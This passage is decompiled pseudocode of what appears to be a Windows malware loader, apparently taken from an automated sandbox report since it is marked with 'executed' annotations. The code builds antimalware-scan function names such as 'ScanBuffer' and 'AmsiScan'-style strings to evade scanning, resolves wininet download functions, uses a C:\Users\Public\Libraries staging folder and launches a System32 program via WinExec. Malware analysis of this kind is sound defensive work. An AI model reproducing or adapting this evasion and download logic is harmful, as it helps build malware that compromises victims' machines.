				E02733690(_v96, _t3375, _t3559, 0x2744b88); // executed
				E02724A98(0x2744b4c, E02724D64( *((intOrPtr*)(0x2740ab8 + E02733658(1, 3) * 4))));
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("ScanString");
				E02724C24();
				E02724A98( &_v104, E02724D64(_v108));
				_push(_v104);
				_t3390 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v116, _t3390, 0x273e77c);
				E02724A98( &_v112, E02724D64(_v116));
				_pop(_t3566); // executed
				E02733690(_v112, _t3375, _t3566, 0x2744b88); // executed
				_t3391 =  *0x2744b4c; // 0x2b89040
				E02724BB0( &_v120, _t3391, "C:\\Windows\\System32\\");
				if(E027280F8(_v120) == 0) {
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanString");
					E02724C24();
					E02724A98( &_v140, E02724D64(_v144));
					_push(_v140);
					_t3392 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v152, _t3392, 0x273e77c);
					E02724A98( &_v148, E02724D64(_v152));
					_pop(_t3572);
					E02733690(_v148, _t3375, _t3572, 0x2744b88);
					E027248F4(0x2744b34, "iexpress.exe");
				} else {
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanString");
					E02724C24();
					E02724A98( &_v124, E02724D64(_v128));
					_push(_v124);
					_t3528 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v136, _t3528, 0x273e77c);
					E02724A98( &_v132, E02724D64(_v136));
					_pop(_t4328); // executed
					E02733690(_v132, _t3375, _t4328, 0x2744b88); // executed
					_t4329 =  *0x2744b4c; // 0x2b89040
					E027248F4(0x2744b34, _t4329);
				}
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v156, E02724D64(_v160));
				_push(_v156);
				_t3393 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v168, _t3393, 0x273e77c);
				E02724A98( &_v164, E02724D64(_v168));
				_pop(_t3578); // executed
				E02733690(_v164, _t3375, _t3578, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v172, E02724D64(_v176));
				_push(_v172);
				_t3394 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v184, _t3394, 0x273e77c);
				E02724A98( &_v180, E02724D64(_v184));
				_pop(_t3583); // executed
				E02733690(_v180, _t3375, _t3583, 0x2744b88); // executed
				E0272C510(0,  &_v188);
				E027248F4(0x27449d8, _v188);
				_t1320 =  *0x27449d8; // 0x2b0e138
				_v192 = _t1320;
				_t3376 = _v192;
				if(_t3376 != 0) {
					_t3376 =  *((intOrPtr*)(_t3376 - 4));
				}
				_t1321 =  *0x27449d8; // 0x2b0e138
				E02724DC4(_t1321, _t3376 - 4, 1, 0x27449c4);
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v196, E02724D64(_v200));
				_push(_v196);
				_t3397 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v208, _t3397, 0x273e77c);
				E02724A98( &_v204, E02724D64(_v208));
				_pop(_t3591); // executed
				E02733690(_v204, _t3376, _t3591, 0x2744b88);
				_t1337 =  *0x27449c4; // 0x2b4f3d0
				E02724A98( &_v212, E02724D64(_t1337));
				_t1342 = E027280F8(_v212);
				_t4343 = _t1342;
				if(_t1342 == 0) {
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("Initialize");
					E02724C24();
					E02724A98( &_v264, E02724D64(_v268));
					_push(_v264);
					_t3398 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v276, _t3398, 0x273e77c);
					E02724A98( &_v272, E02724D64(_v276));
					_pop(_t3597); // executed
					E02733690(_v272, _t3376, _t3597, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v280, E02724D64(_v284));
					_push(_v280);
					_t3399 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v292, _t3399, 0x273e77c);
					E02724A98( &_v288, E02724D64(_v292));
					_pop(_t3602); // executed
					E02733690(_v288, _t3376, _t3602, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v296, E02724D64(_v300));
					_push(_v296);
					_t3400 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v308, _t3400, 0x273e77c);
					E02724A98( &_v304, E02724D64(_v308));
					_pop(_t3607); // executed
					E02733690(_v304, _t3376, _t3607, 0x2744b88); // executed
					E02722FC4(E02727D88(0x273e810, __eflags),  &_v312);
					E02723300(0x27449dc, _v312, __eflags, _t4354);
					_t1390 =  *0x2740e88; // 0x274000c
					 *_t1390 = 0;
					E02722D28(E027236BC());
					E02724F90(0x2744b80, E02722D28(E027234CC(0x27449dc)));
					_t1399 =  *0x2744b80; // 0x7fdf0018
					_v192 = _t1399;
					_t3377 = _v192;
					__eflags = _t3377;
					if(_t3377 != 0) {
						_t3380 = _t3377 - 4;
						__eflags = _t3380;
						_t3377 =  *_t3380;
					}
					E02724DBC(0x2744b80);
					_t1403 = E02723454(0); // executed
					E02722D28(_t1403);
					E02722D28(E02723474(0x27449dc));
					_t1408 =  *0x2744b80; // 0x7fdf0018, executed
					E0273860C(_t1408, _t3377,  &_v316, 0x273e81c, _t4332, 0x2744b88); // executed
					_t3403 =  *0x27385d4; // 0x27385d8
					E02725A4C(0x2744b88, _t3403, _v316);
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v320, E02724D64(_v324));
					_push(_v320);
					_t3404 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v332, _t3404, 0x273e77c);
					E02724A98( &_v328, E02724D64(_v332));
					_pop(_t3619); // executed
					E02733690(_v328, _t3377, _t3619, 0x2744b88); // executed
					E027248F4(0x2744b28,  *((intOrPtr*)( *0x2744b88 + 4)));
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v336, E02724D64(_v340));
					_push(_v336);
					_t3405 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v348, _t3405, 0x273e77c);
					E02724A98( &_v344, E02724D64(_v348));
					_pop(_t3626); // executed
					E02733690(_v344, _t3377, _t3626, 0x2744b88); // executed
					_t1443 = E02727D88(0x273e82c, __eflags);
					_t1444 =  *0x2744b28; // 0x2b48048
					E02738E78(_t1444, _t3377,  &_v352, _t1443, 0x2744b88);
					E027248F4(0x2744bb4, _v352);
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanString");
					E02724C24();
					E02724A98( &_v356, E02724D64(_v360));
					_push(_v356);
					_t3407 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v368, _t3407, 0x273e77c);
					E02724A98( &_v364, E02724D64(_v368));
					_pop(_t3633); // executed
					E02733690(_v364, _t3377, _t3633, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("UacScan");
					E02724C24();
					E02724A98( &_v372, E02724D64(_v376));
					_push(_v372);
					_t3408 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v384, _t3408, 0x273e77c);
					E02724A98( &_v380, E02724D64(_v384));
					_pop(_t3638); // executed
					E02733690(_v380, _t3377, _t3638, 0x2744b88); // executed
					_t1476 =  *0x2744bb4; // 0x2b40d18
					__eflags = E02738BBC(_t1476, 0x273e848, __eflags);
					if(__eflags != 0) {
						_t3247 =  *0x2744bb4; // 0x2b40d18, executed
						E02738CBC(_t3247, _t3377, _t3408,  &_v388, 0x2744b88, __eflags); // executed
						E027248F4(0x2744b7c, _v388);
						E02724A98( &_v392, "InternetOpena");
						_push(_v392);
						E02724A98( &_v396, "wininet");
						_pop(_t4290);
						E02733690(_v396, _t3377, _t4290, 0x2744b88);
						E02724A98( &_v400, "InternetOpenUrl");
						_push(_v400);
						E02724A98( &_v404, "wininet");
						_pop(_t4293);
						E02733690(_v404, _t3377, _t4293, 0x2744b88);
						E02724A98( &_v408, "InternetReadFile");
						_push(_v408);
						E02724A98( &_v412, "wininet");
						_pop(_t4296);
						E02733690(_v412, _t3377, _t4296, 0x2744b88);
						E02724A98( &_v416, "InternetCloseHandle");
						_push(_v416);
						E02724A98( &_v420, "wininet");
						_pop(_t4299);
						E02733690(_v420, _t3377, _t4299, 0x2744b88);
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v424, E02724D64(_v428));
						_push(_v424);
						_t3523 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v436, _t3523, 0x273e77c);
						E02724A98( &_v432, E02724D64(_v436));
						_pop(_t4304); // executed
						E02733690(_v432, _t3377, _t4304, 0x2744b88); // executed
					}
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v440, E02724D64(_v444));
					_push(_v440);
					_t3409 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v452, _t3409, 0x273e77c);
					E02724A98( &_v448, E02724D64(_v452));
					_pop(_t3644); // executed
					E02733690(_v448, _t3377, _t3644, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v456, E02724D64(_v460));
					_push(_v456);
					_t3410 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v468, _t3410, 0x273e77c);
					E02724A98( &_v464, E02724D64(_v468));
					_pop(_t3649); // executed
					E02733690(_v464, _t3377, _t3649, 0x2744b88); // executed
				} else {
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("Initialize");
					E02724C24();
					E02724A98( &_v216, E02724D64(_v220));
					_push(_v216);
					_t3524 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v228, _t3524, 0x273e77c);
					E02724A98( &_v224, E02724D64(_v228));
					_pop(_t4309);
					E02733690(_v224, _t3376, _t4309, 0x2744b88);
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v232, E02724D64(_v236));
					_push(_v232);
					_t3525 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v244, _t3525, 0x273e77c);
					E02724A98( &_v240, E02724D64(_v244));
					_pop(_t4314);
					E02733690(_v240, _t3376, _t4314, 0x2744b88);
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v248, E02724D64(_v252));
					_push(_v248);
					_t3526 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v260, _t3526, 0x273e77c);
					E02724A98( &_v256, E02724D64(_v260));
					_pop(_t4319);
					E02733690(_v256, _t3376, _t4319, 0x2744b88);
					_t4320 =  *0x27449c4; // 0x2b4f3d0
					E02723300(0x27449dc, _t4320, _t4343, _t4354);
					_t3337 =  *0x2740e88; // 0x274000c
					 *_t3337 = 0;
					E02722D28(E027236BC());
					E02724F90(0x2744b7c, E02722D28(E027234CC(0x27449dc)));
					_t3346 =  *0x2744b7c; // 0x2ade208
					_v192 = _t3346;
					_t3377 = _v192;
					if(_t3377 != 0) {
						_t3381 = _t3377 - 4;
						_t4345 = _t3381;
						_t3377 =  *_t3381;
					}
					E02724DBC(0x2744b7c);
					E02722D28(E02723454(0));
					E02722D28(E02723474(0x27449dc));
				}
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("Initialize");
				E02724C24();
				E02724A98( &_v472, E02724D64(_v476));
				_push(_v472);
				_t3411 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v484, _t3411, 0x273e77c);
				E02724A98( &_v480, E02724D64(_v484));
				_pop(_t3654); // executed
				E02733690(_v480, _t3377, _t3654, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v488, E02724D64(_v492));
				_push(_v488);
				_t3412 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v500, _t3412, 0x273e77c);
				E02724A98( &_v496, E02724D64(_v500));
				_pop(_t3659); // executed
				E02733690(_v496, _t3377, _t3659, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("ScanString");
				E02724C24();
				E02724A98( &_v504, E02724D64(_v508));
				_push(_v504);
				_t3413 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v516, _t3413, 0x273e77c);
				E02724A98( &_v512, E02724D64(_v516));
				_pop(_t3664); // executed
				E02733690(_v512, _t3377, _t3664, 0x2744b88); // executed
				E027248F4(0x2744b40, 0x273e82c);
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v520, E02724D64(_v524));
				_push(_v520);
				_t3414 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v532, _t3414, 0x273e77c);
				E02724A98( &_v528, E02724D64(_v532));
				_pop(_t3670); // executed
				E02733690(_v528, _t3377, _t3670, 0x2744b88); // executed
				_push(0x273e77c);
				_push( *0x2744bb0);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v536, E02724D64(_v540));
				_push(_v536);
				_t3415 =  *0x2744bb0; // 0x2b81b38
				E02724BB0( &_v548, _t3415, 0x273e77c);
				E02724A98( &_v544, E02724D64(_v548));
				_pop(_t3675); // executed
				E02733690(_v544, _t3377, _t3675, 0x2744b88);
				_t1578 =  *0x2744b7c; // 0x2ade208
				_t1579 = E02738BF8(_t1578, _t3377, _t4345);
				_t4346 = (_t1579 ^ 0x00000001) - 1;
				if((_t1579 ^ 0x00000001) != 1) {
					L60:
					__eflags = 0;
					_pop(_t3676);
					 *[fs:eax] = _t3676;
					_push(0x273e74c);
					E027248C4( &_v2900, 0x62);
					E027248C4( &_v2500, 2);
					E027248C4( &_v2508, 2);
					E027248C4( &_v2492, 0x61);
					E027248A0( &_v2092);
					E027248C4( &_v2104, 3);
					E027248C4( &_v1832, 0x5e);
					E027248C4( &_v1452, 3);
					E027248A0( &_v1456);
					E027248C4( &_v1440, 0x63);
					E027248C4( &_v1044, 0x64);
					E027248C4( &_v644, 9);
					_t3687 =  *0x27385d4; // 0x27385d8
					E02725A10( &_v608, _t3687);
					E027248C4( &_v604, 0x48);
					_t3689 =  *0x27385d4; // 0x27385d8
					E02725A10( &_v316, _t3689);
					E027248C4( &_v312, 0x11);
					E027248C4( &_v244, 0xd);
					return E027248C4( &_v188, 0x2e);
				} else {
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v552, E02724D64(_v556));
					_push(_v552);
					_t3418 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v564, _t3418, 0x273e77c);
					E02724A98( &_v560, E02724D64(_v564));
					_pop(_t3697); // executed
					E02733690(_v560, _t3377, _t3697, 0x2744b88);
					_t1632 =  *0x2744b40; // 0x2b81b78
					_t1633 = E02727D88(_t1632, _t4346);
					_t1634 =  *0x2744b7c; // 0x2ade208
					E02738F20(_t1634, _t3377,  &_v568, _t1633, _t4332, 0x2744b88);
					E027248F4(0x27449d8, _v568);
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v572, E02724D64(_v576));
					_push(_v572);
					_t3420 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v584, _t3420, 0x273e77c);
					E02724A98( &_v580, E02724D64(_v584));
					_pop(_t3704); // executed
					E02733690(_v580, _t3377, _t3704, 0x2744b88); // executed
					_t1652 =  *0x27449d8; // 0x2b0e138
					E02738C58(_t1652, _t3420,  &_v588);
					E027248F4(0x27449d8, _v588);
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanString");
					E02724C24();
					E02724A98( &_v592, E02724D64(_v596));
					_push(_v592);
					_t3421 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v604, _t3421, 0x273e77c);
					E02724A98( &_v600, E02724D64(_v604));
					_pop(_t3711); // executed
					E02733690(_v600, _t3377, _t3711, 0x2744b88); // executed
					_t3712 =  *0x2740ac8; // 0x50efa4
					E02724B28( &_v612, _t3712);
					_t1672 =  *0x27449d8; // 0x2b0e138, executed
					E0273860C(_t1672, _t3377,  &_v608, _v612, _t4332, 0x2744b88); // executed
					_t3423 =  *0x27385d4; // 0x27385d8
					E02725A4C(0x2744b88, _t3423, _v608);
					E027248F4(0x2744bdc,  *((intOrPtr*)( *0x2744b88 + 4)));
					E027248F4(0x2744bd4,  *((intOrPtr*)( *0x2744b88 + 8)));
					E027248F4(0x2744b74,  *((intOrPtr*)( *0x2744b88 + 0xc)));
					E027248F4(0x2744bd8,  *((intOrPtr*)( *0x2744b88 + 0x10)));
					E027248F4(0x2744bbc,  *((intOrPtr*)( *0x2744b88 + 0x14)));
					E027248F4(0x2744bc0,  *((intOrPtr*)( *0x2744b88 + 0x18)));
					E027248F4(0x2744bc4,  *((intOrPtr*)( *0x2744b88 + 0x1c)));
					E027248F4(0x2744bc8,  *((intOrPtr*)( *0x2744b88 + 0x20)));
					E027248F4(0x2744bcc,  *((intOrPtr*)( *0x2744b88 + 0x24)));
					E027248F4(0x2744b38,  *((intOrPtr*)( *0x2744b88 + 0x28)));
					E027248F4(0x2744b3c,  *((intOrPtr*)( *0x2744b88 + 0x2c)));
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("Initialize");
					E02724C24();
					E02724A98( &_v616, E02724D64(_v620));
					_push(_v616);
					_t3424 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v628, _t3424, 0x273e77c);
					E02724A98( &_v624, E02724D64(_v628));
					_pop(_t3741); // executed
					E02733690(_v624, _t3377, _t3741, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v632, E02724D64(_v636));
					_push(_v632);
					_t3425 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v644, _t3425, 0x273e77c);
					E02724A98( &_v640, E02724D64(_v644));
					_pop(_t3746); // executed
					E02733690(_v640, _t3377, _t3746, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v648, E02724D64(_v652));
					_push(_v648);
					_t3426 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v660, _t3426, 0x273e77c);
					E02724A98( &_v656, E02724D64(_v660));
					_pop(_t3751); // executed
					E02733690(_v656, _t3377, _t3751, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v664, E02724D64(_v668));
					_push(_v664);
					_t3427 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v676, _t3427, 0x273e77c);
					E02724A98( &_v672, E02724D64(_v676));
					_pop(_t3756); // executed
					E02733690(_v672, _t3377, _t3756, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanString");
					E02724C24();
					E02724A98( &_v680, E02724D64(_v684));
					_push(_v680);
					_t3428 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v692, _t3428, 0x273e77c);
					E02724A98( &_v688, E02724D64(_v692));
					_pop(_t3761); // executed
					E02733690(_v688, _t3377, _t3761, 0x2744b88); // executed
					E027248F4(0x2744b84, "C:\\Users\\Public\\Libraries");
					_t1770 =  *0x2744b84; // 0x2b64d80
					E02724A98( &_v696, E02724D64(_t1770));
					if(E0272811C(_v696) == 0) {
						_t3241 =  *0x2744b84; // 0x2b64d80
						E02724A98( &_v700, E02724D64(_t3241));
						E027282B0(_v700);
					}
					_t1776 =  *0x2744bd4; // 0x2b893a0
					_v192 = _t1776;
					_t3378 = _v192;
					if(_t3378 != 0) {
						_t3378 =  *((intOrPtr*)(_t3378 - 4));
					}
					_t1777 =  *0x2744bd4; // 0x2b893a0
					E02724DC4(_t1777, _t3378 != 3, 1, 0x2744bd4);
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("Initialize");
					E02724C24();
					E02724A98( &_v704, E02724D64(_v708));
					_push(_v704);
					_t3431 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v716, _t3431, 0x273e77c);
					E02724A98( &_v712, E02724D64(_v716));
					_pop(_t3769); // executed
					E02733690(_v712, _t3378, _t3769, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanBuffer");
					E02724C24();
					E02724A98( &_v720, E02724D64(_v724));
					_push(_v720);
					_t3432 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v732, _t3432, 0x273e77c);
					E02724A98( &_v728, E02724D64(_v732));
					_pop(_t3774); // executed
					E02733690(_v728, _t3378, _t3774, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("OpenSession");
					E02724C24();
					E02724A98( &_v736, E02724D64(_v740));
					_push(_v736);
					_t3433 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v748, _t3433, 0x273e77c);
					E02724A98( &_v744, E02724D64(_v748));
					_pop(_t3779); // executed
					E02733690(_v744, _t3378, _t3779, 0x2744b88); // executed
					_push(0x273e77c);
					_push( *0x2744bb0);
					_push("ScanString");
					E02724C24();
					E02724A98( &_v752, E02724D64(_v756));
					_push(_v752);
					_t3434 =  *0x2744bb0; // 0x2b81b38
					E02724BB0( &_v764, _t3434, 0x273e77c);
					E02724A98( &_v760, E02724D64(_v764));
					_pop(_t3784); // executed
					E02733690(_v760, _t3378, _t3784, 0x2744b88);
					_t1835 =  *0x2744bbc; // 0x2b81b88
					E02724CB0(_t1835, 0x273e8cc);
					if(_t3378 != 3) {
						L31:
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("Initialize");
						E02724C24();
						E02724A98( &_v1240, E02724D64(_v1244));
						_push(_v1240);
						_t3435 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1252, _t3435, 0x273e77c);
						E02724A98( &_v1248, E02724D64(_v1252));
						_pop(_t3790); // executed
						E02733690(_v1248, _t3378, _t3790, 0x2744b88); // executed
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v1256, E02724D64(_v1260));
						_push(_v1256);
						_t3436 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1268, _t3436, 0x273e77c);
						E02724A98( &_v1264, E02724D64(_v1268));
						_pop(_t3795); // executed
						E02733690(_v1264, _t3378, _t3795, 0x2744b88); // executed
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v1272, E02724D64(_v1276));
						_push(_v1272);
						_t3437 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1284, _t3437, 0x273e77c);
						E02724A98( &_v1280, E02724D64(_v1284));
						_pop(_t3800); // executed
						E02733690(_v1280, _t3378, _t3800, 0x2744b88); // executed
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("ScanString");
						E02724C24();
						E02724A98( &_v1288, E02724D64(_v1292));
						_push(_v1288);
						_t3438 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1300, _t3438, 0x273e77c);
						E02724A98( &_v1296, E02724D64(_v1300));
						_pop(_t3805); // executed
						E02733690(_v1296, _t3378, _t3805, 0x2744b88); // executed
						_t3806 =  *0x2744bdc; // 0x2b6c0c8
						_t1893 =  *0x2744b74; // 0x4a41bd8
						E0273888C(_t1893, _t3378,  &_v1304, _t3806, _t4332, 0x2744b88);
						E027248F4(0x2744b2c, _v1304);
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v1308, E02724D64(_v1312));
						_push(_v1308);
						_t3440 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1320, _t3440, 0x273e77c);
						E02724A98( &_v1316, E02724D64(_v1320));
						_pop(_t3812); // executed
						E02733690(_v1316, _t3378, _t3812, 0x2744b88); // executed
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v1324, E02724D64(_v1328));
						_push(_v1324);
						_t3441 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1336, _t3441, 0x273e77c);
						E02724A98( &_v1332, E02724D64(_v1336));
						_pop(_t3817); // executed
						E02733690(_v1332, _t3378, _t3817, 0x2744b88);
						_t1925 =  *0x2744bcc; // 0x2b81ba8
						_t1926 = E02727D88(_t1925, __eflags);
						_t1927 =  *0x2744b2c; // 0x2a5e678
						E02738E78(_t1927, _t3378,  &_v1340, _t1926, 0x2744b88);
						E027248F4(0x2744b30, _v1340);
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v1344, E02724D64(_v1348));
						_push(_v1344);
						_t3443 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1356, _t3443, 0x273e77c);
						E02724A98( &_v1352, E02724D64(_v1356));
						_pop(_t3824); // executed
						E02733690(_v1352, _t3378, _t3824, 0x2744b88); // executed
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v1360, E02724D64(_v1364));
						_push(_v1360);
						_t3444 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1372, _t3444, 0x273e77c);
						E02724A98( &_v1368, E02724D64(_v1372));
						_pop(_t3829); // executed
						E02733690(_v1368, _t3378, _t3829, 0x2744b88); // executed
						_t1959 =  *0x2744b30; // 0x4a137a8
						E02738E04(_t1959, _t3378, _t3444,  &_v1380, _t4332, 0x2744b88);
						E02738C58(_v1380, _t3444,  &_v1376);
						E027248F4(0x2744b78, _v1376);
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("OpenSession");
						E02724C24();
						E02724A98( &_v1384, E02724D64(_v1388));
						_push(_v1384);
						_t3445 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1396, _t3445, 0x273e77c);
						E02724A98( &_v1392, E02724D64(_v1396));
						_pop(_t3837); // executed
						E02733690(_v1392, _t3378, _t3837, 0x2744b88); // executed
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("ScanBuffer");
						E02724C24();
						E02724A98( &_v1400, E02724D64(_v1404));
						_push(_v1400);
						_t3446 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1412, _t3446, 0x273e77c);
						E02724A98( &_v1408, E02724D64(_v1412));
						_pop(_t3842); // executed
						E02733690(_v1408, _t3378, _t3842, 0x2744b88); // executed
						_push(0x273e77c);
						_push( *0x2744bb0);
						_push("ScanString");
						E02724C24();
						E02724A98( &_v1416, E02724D64(_v1420));
						_push(_v1416);
						_t3447 =  *0x2744bb0; // 0x2b81b38
						E02724BB0( &_v1428, _t3447, 0x273e77c);
						E02724A98( &_v1424, E02724D64(_v1428));
						_pop(_t3847); // executed
						E02733690(_v1424, _t3378, _t3847, 0x2744b88);
						_t2007 =  *0x2744bd8; // 0x0
						E02724CB0(_t2007, 0x273e8cc);
						if(__eflags != 0) {
							L35:
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("ScanBuffer");
							E02724C24();
							E02724A98( &_v2132, E02724D64(_v2136));
							_push(_v2132);
							_t3448 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2144, _t3448, 0x273e77c);
							E02724A98( &_v2140, E02724D64(_v2144));
							_pop(_t3853); // executed
							E02733690(_v2140, _t3378, _t3853, 0x2744b88); // executed
							_push(0x273e77c);
							_push( *0x2744bb0);
							_push("OpenSession");
							E02724C24();
							E02724A98( &_v2148, E02724D64(_v2152));
							_push(_v2148);
							_t3449 =  *0x2744bb0; // 0x2b81b38
							E02724BB0( &_v2160, _t3449, 0x273e77c);
							E02724A98( &_v2156, E02724D64(_v2160));
							_pop(_t3858); // executed
							E02733690(_v2156, _t3378, _t3858, 0x2744b88);
							_t2037 =  *0x2744bc4; // 0x2b81b48
							E02724CB0(_t2037, 0x273e8cc);
							if(__eflags == 0) {
								_t2540 =  *0x2744bc0; // 0x0
								E02724CB0(_t2540, 0x273e8cc);
								if(__eflags != 0) {
									_t2542 =  *0x2744bc8; // 0x0
									E02724CB0(_t2542, 0x273e8cc);
									if(__eflags != 0) {
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v2164, E02724D64(_v2168));
										_push(_v2164);
										_t3467 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2176, _t3467, 0x273e77c);
										E02724A98( &_v2172, E02724D64(_v2176));
										_pop(_t4044); // executed
										E02733690(_v2172, _t3378, _t4044, 0x2744b88); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("OpenSession");
										E02724C24();
										E02724A98( &_v2180, E02724D64(_v2184));
										_push(_v2180);
										_t3468 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2192, _t3468, 0x273e77c);
										E02724A98( &_v2188, E02724D64(_v2192));
										_pop(_t4049); // executed
										E02733690(_v2188, _t3378, _t4049, 0x2744b88); // executed
										_t3469 =  *0x2744b34; // 0x2b89040
										E02724BB0( &_v2196, _t3469, "C:\\Windows\\System32\\");
										WinExec(E02724D64(_v2196), 0); // executed
										Sleep(0x1f4); // executed
										_push(0x273e77c);
										_push( *0x2744bb0);
										_push("ScanBuffer");
										E02724C24();
										E02724A98( &_v2200, E02724D64(_v2204));
										_push(_v2200);
										_t3470 =  *0x2744bb0; // 0x2b81b38
										E02724BB0( &_v2212, _t3470, 0x273e77c);
										E02724A98( &_v2208, E02724D64(_v2212));
										_pop(_t4055); // executed
										E02733690(_v2208, _t3378, _t4055, 0x2744b88); // executed
										_push(0x273e77c);
